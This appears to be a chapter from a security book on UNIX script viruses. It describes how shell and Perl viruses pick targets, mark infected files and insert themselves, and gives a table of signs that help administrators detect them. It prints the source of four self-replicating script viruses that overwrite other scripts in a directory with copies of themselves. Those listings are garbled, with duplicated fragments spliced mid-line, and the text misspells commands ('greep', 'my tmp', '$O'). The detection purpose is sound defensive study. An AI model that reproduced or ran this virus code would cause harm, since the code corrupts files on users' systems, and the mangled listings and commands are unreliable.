Chapter 18: Viruses in Scripts | Shellcoders Programming Uncovered (Uncovered series)

Overview

As was mentioned before, scripts appear to be a friendly environment for the propagation of viruses. This is because of the following reasons:

In the UNIX world, scripts are omnipresent.
Modification of most script files is allowed.
Most frequently, scripts comprise hundreds of code lines, in which it is easy to get lost.
Scripts are abstracted from the implementation details of specific UNIX versions.
Capabilities of scripts are comparable to those of high-level programming languages (C, Basic, Pascal).
Users exchange scripts more intensely than executable files.

Most administrators neglect script viruses and scornfully call them "fictitious" viruses. However, by the highest standards, for the system it doesn't matter whether or not the virus that has attacked it is "true." Although script viruses appear as "toys," they pose quite a serious threat. Their natural habitat is practically unlimited. They successfully infect all types of computers, including the ones based on Intel Pentium and DEC Alpha/Sun SPARC processors. They can insert themselves into any possible location (head, tail, or middle) of the file being infected. If desired, they might remain in the memory, infecting files in the background mode. A certain range of script viruses use specific stealth technologies, thus concealing their presence in the system. The engineering genius of virus writers has already mastered polymorphism, having thus equaled script viruses in rights with viruses infecting binary files.

Therefore, every script obtained from outside must be carefully checked for the presence of viruses before installing it into the system. The situation is made even worse because in contrast to binary files, scripts represent plaintext with no internal structure. Because of this, no typical changes can be noted when the script file becomes infected. The only detail that viruses cannot forge is the listing layout style . Every programmer has an individual style of formatting the source code, like every individual has his or her own handwriting. Some use tab characters; others prefer blank characters for alignment. Some programmers like to expand the if - else construct over the entire screen, and others fit it within a single line. Some programmers prefer to assign all variables meaningful names, but others use meaningless names one or two characters long. Even if you view the infected file quite briefly , you'll immediately notice extrinsic insertions (provided that the virus doesn't reformat the object being infected). For example, consider Listing 18.1, which presents a virus that discloses its presence by the formatting-style differences. Lack of the line feed (<LF>) character is untypical for normal scripts, which will immediately attract the attention of the system administrator.

Listing 18.1: Example of a virus that discloses its presence by an untypical formatting style

 #!/usr/bin/perl #PerlDemo open(File,  #!/usr/bin/perl #PerlDemo open (File,$0); @virus=<File>; @Virus=@Virus[0...6]; close(File); foreach $FileName (< ^* >) { if ((-r $FileName) && (-w $FileName) && (-f $FileName)) { open(File, "$FileName"); @Temp=<File>; close(File); if ((@Temp[1] =~ "PerlDemo") or (@Temp[2] =~ "PerlDemo")) { if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) { open(File, ">$FileName"); print File @Virus; print File @Temp; close (File); } } } } 
 ); @virus=<File>; @Virus=@Virus[0...6]; close(File); foreach $FileName (< ^* >) { if ((-r $FileName) && (-w $FileName) && (-f $FileName)) { open(File, "$FileName"); @Temp=<File>; close(File); if ((@Temp[1] =~ "PerlDemo") or (@Temp[2] =~ "PerlDemo")) { if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) { open(File, ">$FileName"); print File @Virus; print File @Temp; close (File); } } } }

An expertly-designed virus infects only the files of the type suitable for infection; otherwise , it would quickly result in a system crash, thus disclosing its presence and paralyzing further propagation. Because in the UNIX world there is no habit of giving file name extensions to files, the task of searching suitable targets for infection becomes considerably complicated and the virus must explicitly try one file after another, checking their types "manually."

There are at least two techniques of carrying out this task: identifying the command-line interpreter and heuristic analysis. With the first technique, if the #! "magic sequence" is found in the start of the file, then the remaining part of the line contains the path to the program that processes this script. For the Bourne interpreter, this line usually appears as #!/bin/sh , and for Perl it is #!/usr/bin/perl . Thus, the task of determining the file type in most cases is reduced to reading its first line and comparing it with one or more templates. Provided that the virus didn't use a hash comparison, the reference strings will be explicitly present in the infected file. Thus, the virus's presence can be easily detected using a trivial context search (see Listings 18.2 and 18.3).

Listing 18.2: Fragment of the UNIX Tail.a virus that writes itself to the tail of the target file

  #!/bin/sh   echo "Hello, World!"  for F in ^* do   if ["$(head -c9 $F 2>/dev/null)"="#!/bin/sh" -a "$ (tail -1 $F 2>/ dev/null)"!="#:-P"]   then         tail -8   #!/bin/sh   echo "Hello, World!"  for F in ^* do if ["$(head -c9 $F 2>/dev/null)"="#!/bin/sh" -a "$ (tail -1 $F 2>/ dev/null)"!="#:-P"] then tail -8 $0 >> $F 2>/dev/null fi done #:-P 
 >> $F 2>/dev/null   fi done #:-P

Listing 18.3: Fragment of UNIX.Head.b inserting its body into the beginning of the target file

  #!/bin/sh  for F in ^* do         if [ "$(head -c9 $F 2> /dev/null) " = "#!/bin/sh" ] then                 head -11   #!/bin/sh  for F in ^* do if [ "$(head -c9 $F 2> /dev/null) " = "#!/bin/sh" ] then head -11 $0 > tmp cat $F >> tmp my tmp $F fi done  echo "Hello, World!"  
 > tmp                 cat $F >> tmp                 my tmp $F         fi done  echo "Hello, World!"

Nine script viruses out of ten can be disclosed using this trivial technique. The other ones, which are more sophisticated, carefully conceal the reference strings from "outsider's" eyes. For example, the virus might encrypt reference strings or compare them character by character. However, before comparing the string to the reference, the virus must read it. As a rule, batch files use the greep or head commands for this purpose. The presence of these commands in the file is not in itself proof of infection; however, it allows an administrator to locate vitallyimportant virus centers responsible for determining the file type, which considerably speeds up the analysis. In Perl scripts, the file-read operation is most frequently carried out using the < and > operators, and functions like read, readline , and getc are used more rarely. No serious Perl program can do without file input/output, seriously complicating detection of the virus code, especially if the file-read operation is carried out in one program branch, and its type is determined in a different branch. This complicates automated analysis; however, it doesn't make such analysis impossible .

Heuristic algorithms of searching the target for infection consist of detection of unique sequences typical for the given type of files and never encountered in files of other types. For example, the presence of the if [ sequence, with a probability close to one, is evidence of the batch script. Some viruses identify batch scripts by the Bourne string, which is present in most scripts. There are no universal techniques of recognizing heuristic algorithms (after all, heuristic algorithms were invented to achieve this).

To avoid reinfecting the host file multiple times, viruses must recognize their presence in such files. The most obvious (and, consequently, popular) algorithm is the insertion of a special key label, which represents a unique sequence of commands, or, so to say, a virus signature or simply intricate comment. Viruses do not need guaranteed uniqueness. It is enough to ensure that the key label is missing in more than 50% of uninfected files. The search for the key label can be carried out using the find and greep commands or through line-by-line reading from the file and further comparing these strings with the reference ones. Command interpreter scripts use for this purpose head and tail commands, applied in combination with the = operator. As relates to Perl viruses, they tend to use regular expressions, which considerably complicates their detection because practically no Perl program can do without regular expressions.

Another possible clue might be represented by the $0 variable, used by viruses for determining their own names. Interpreted languages have no idea about how scripts are located in memory; therefore, they are unable to reach them despite the greatest desire . Thus, the only method of reproducing their own bodies is reading the source file, the name of which is passed in argument 0 of the command line. This is characteristic evidence, clearly indicating that the file being investigated has been infected, because there are few reasons a program might be interested in its own path and file name.

There is another method of spawning (at least in theory). It works according to the same principle as the program producing its own printout (once upon a time, no student contest in the field of computer science could do without this problem). The solution is forming the variable that would contain the program code of the virus and then inserting it into the file to be infected. In the simplest case, << the construct can be used, allowing it to conceal the code insertion in the text variable (which is the advantage of Perl over C). Line-by-line code generation such as @virus[0]= "\#\!\/usr\/bin\/perl" is encountered more rarely because it is too bulky, impractical , and self-evident (the virus will be located immediately even when briefly viewing the listing).

Encrypted viruses are even easier to recognize. The most primitive instances contain a large number of " noisy " binary sequences such as \x73\xFF\x33\x69\x02\xll... , where the \x specifier is used as a "flagship" followed by ASCII code of the encrypted character. More advanced viruses use specific variants of UUE encoding, thanks to which all encrypted lines appear readable although they represent meaningless garbage like usKL[as4iJk . Taking into account that on average, the minimal length of Perl viruses is about 500 bytes, they can be easily hidden inside the body of the host file.

Now consider the methods of inserting the virus into the host file. Command-interpreter files and programs written in the Perl language represent hierarchical sequences of commands, including function definitions, if necessary. Here, there is nothing that would bear at least the slightest resemblance to the main function of the C language or the BEGIN/END block of the Pascal language. The virus code, simply added to the tail of the file, will with 90% probability gain control and work successfully. The remaining 10% fall to the cases when the program terminates prematurely by the exit command or its execution is forcibly terminated by the <Ctrl>+<C> key combination. To copy its body from the end of one file to the end of another file, viruses, as a rule, use the tail command, which they call approximately as shown in Listing 18.2 (the original lines of the target files are in bold).

Other viruses insert their bodies into the start of the file, capturing full control. Some of them contain an amusing error that results in duplication of the !#/bin/xxx string, the first of which belongs to the virus itself and the second of which belongs to the infected program. The presence of two !# magic sequences in the file being analyzed serves as clear evidence of the virus infection. However, most viruses process this situation correctly, copying their bodies from the second line, not from the first one. A typical example of such a virus is presented in Listing 18.3 (the original lines of the target files are in bold).

A few viruses, however, insert their bodies into the middle of the file, sometimes mixing it with the original content of the target file. To prevent the self reproduction process from being stopped , the virus must mark "its" lines using some methods (for example, by adding comments such as #MY LINE ) or insert its code into the lines with fixed numbers . For instance, the following rule might be adopted: Starting from line 13, every odd line of the file contains the virus body. The first algorithm is too self-evident, but the second one is too nonviable, because part of the virus might fall into one function and another part of the virus might fall into a different function. Therefore, such viruses are not worth being considered here.

Thus, the head and the tail of every script file are the most probable locations, into which script viruses would try to insert their bodies. They must be considered most carefully, without forgetting that the virus might contain a certain number of deceitful commands imitating some kinds of useful work.

It is also possible to encounter "satellite" viruses, which do not even touch original files but instead create lots of their replicas in other directories. The fans of "pure" command lines, who usually view the contents of directories using the ls command, might not even notice this, because the ls command might have a "twin" that providently removes its name from the list of displayed files.

In addition, do not forget that virus writers might be careless to such an extent that they call procedures and/or variables too openly, such as "Infected," "Virus," or "Pest."

Sometimes, viruses (especially polymorphic and encrypted ones) need to place part of the program code into some temporary file, fully or partially passing control to it. In this case, the chmod +x command will appear in the script body, which assigns the executable attribute to the temporary file. Nevertheless, you shouldn't expect that the author of the virus will be so lazy or so naive that no efforts aimed at concealing the virus activity would be undertaken. Most frequently, in such cases you'll encounter something that appears as follows : chmod Sattr $FiIeName .

Table 18.1 lists typical constructs that indicate the presence of script viruses, with brief comments provided.

Table 18.1: Typical indications of virus presence
Indication	Comment
#!/bin/sh "\#\!\/usr\/bin\/perl"	If this string is located in a line other than the first line of the file, then the script probably is infected, especially, if the #! sequence is located somewhere inside the if-then operator or is passed to the greep and/or find commands.
greep find	These are used for determining the type of target file and for searching for the infecting mark (to avoid reinfecting the file). Unfortunately, it cannot be considered an indication sufficient to consider that the file is infected, because sometimes it is used in "honest" commands.
$O	This is a typical indication of a self-reproducing program. (Why else might the script need to know its full path?)
head	This is used for determining the type of the target file and retrieving the virus body from the beginning of the host script.
tail	This is used for retrieving the virus body from the tail of the host script.
chmod +x	If this command is applied to a dynamically-created file, this with a high level of probability can be considered an indication of the virus's presence (at the same time, the +x key might be concealed in some way).
<<	If this operator is used for loading software code into the variable, this is a typical indication of the presence of some virus (including polymorphic ones).
"\xAA\xBB\xCC..." "Aj#9KlRzS"	These are typical indications of an encrypted virus.
vir, virus, virii, infect...	This is a typical indication of the virus's presence; however, this also might simply be a joke.

To practice visual detection of typical constructs indicating a virus's presence, consider Listing 18.4.

Listing 18.4: Fragment of the UNIX.Demo Perl virus

 #!/usr/bin/perl #PerlDemo open (File,  #!/usr/bin/perl #PerlDemo open (File, $0); @Virus = <File>; @Virus  =  @Virus[0...27]; close (File); foreach $FileName (< ^* >) { if ((-r $FileName) && (-w $FileName) && (-f $FileName)) { open(File, "$FileName"); @Temp - <File>; close(File); if ((@Temp[1] =~ "PerlDemo") or (@Temp[2] =~ "PerlDemo")) { if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) { open(File, ">$FileName"); print File Virus; print File @Temp; close (File); } } } } 
 ); @Virus = <File>; @Virus  =  @Virus[0...27]; close (File); foreach $FileName (< ^* >) {         if ((-r $FileName) && (-w $FileName) && (-f $FileName))         {             open(File, "$FileName");             @Temp - <File>;             close(File);             if ((@Temp[1] =~ "PerlDemo") or (@Temp[2] =~ "PerlDemo"))             {                      if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl"))                       {                                open(File, ">$FileName");                                print File Virus;                                print File @Temp;                                close (File);                       }             }         } }